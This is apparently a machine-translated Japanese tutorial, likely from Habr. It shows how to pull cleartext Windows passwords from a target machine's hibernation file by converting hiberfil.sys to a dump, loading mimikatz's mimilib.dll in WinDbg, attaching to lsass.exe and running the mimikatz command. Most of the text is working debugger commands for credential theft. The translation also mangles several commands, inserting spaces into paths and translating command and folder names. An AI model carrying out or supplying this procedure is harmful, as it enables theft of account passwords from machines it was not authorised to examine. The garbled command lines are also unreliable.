準備する
計画を実施するには、次のユーティリティが必要です。
- Windows用デバッグツール 。
- メモリはWindowsのツールキットの無料版を、
- そして、実際、 ミミカッツ自身。
アクション
1.ターゲットマシンからhiberfil.sysファイルを取得します。
2.ファイルをWinDbgが理解できる形式に変換します。
hibr2dmp.exe d:\ temp \ hiberfil.sys c:\ temp \ hiberfil.dmp
このプロセスにはかなり時間がかかる場合があります。
![画像](https://habrastorage.org/getpro/habr/post_images/d26/ba6/75d/d26ba675d689805488739defbba16743.jpg)
3. WinDbgを実行し、結果のファイルを開きます。
ファイル->クラッシュダンプを開く
4.デバッグシンボルを構成します。
ファイル->シンボルファイルパス...を開き、次の行を入力します。
SRV * c:\シンボル* http://msdl.microsoft.com/download/symbols
![画像](https://habrastorage.org/getpro/habr/post_images/d87/dc3/079/d87dc3079d7e037ea625f5d8d1c35596.png)
c:\シンボルの代わりに、当然、シンボルがロードされるディレクトリがあります
デバッガーのコマンドラインでは、次のように記述します。
0:kd> .reload / n
キャラクターのロードを待っています:
![画像](https://habrastorage.org/getpro/habr/post_images/96f/419/0d3/96f4190d3f0d13c93fd9743df86fb492.png)
5. mimilib.dllライブラリへのパスを指定します(mimikatzのあるディレクトリにあります)。
0:kd> .load z:\ Soft \ Security \ Passwords \ Mimikatz \ x64 \ mimilib.dll
![画像](https://habrastorage.org/getpro/habr/post_images/5f2/ca9/b6b/5f2ca9b6bb06f47b243921f15bc30c8d.png)
6. lsass.exeプロセスのアドレスを見つけます。
0:kd> !プロセス0 0 lsass.exe
![画像](https://habrastorage.org/getpro/habr/post_images/51f/883/f08/51f883f08fbae68b3c4272fb1373eaa5.png)
この場合、アドレスはfffffa800a7d9060です。
7.プロセスのコンテキストを切り替えます。
0:kd> .process / r / p fffffa800a7d9060
![画像](https://habrastorage.org/getpro/habr/post_images/e89/4cb/df1/e894cbdf1184058fb4a93d29dcd33127.png)
8. mimikatzを実行し、クリアテキストでパスワードを取得します。
0:kd> !ミミカッツ
![画像](https://habrastorage.org/getpro/habr/post_images/213/a9d/c23/213a9dc239737d75bd6773c4506856fd.png)
関連リンク
Microsoft Windows資格情報開示: http : //www.securitylab.ru/vulnerability/420418.php
LSA認証: https : //msdn.microsoft.com/en-us/library/windows/desktop/aa378326(v=vs.85).aspx
:何のための認証ダイジェストですhttps://technet.microsoft.com/en-us/library/cc778868(WS.10).aspx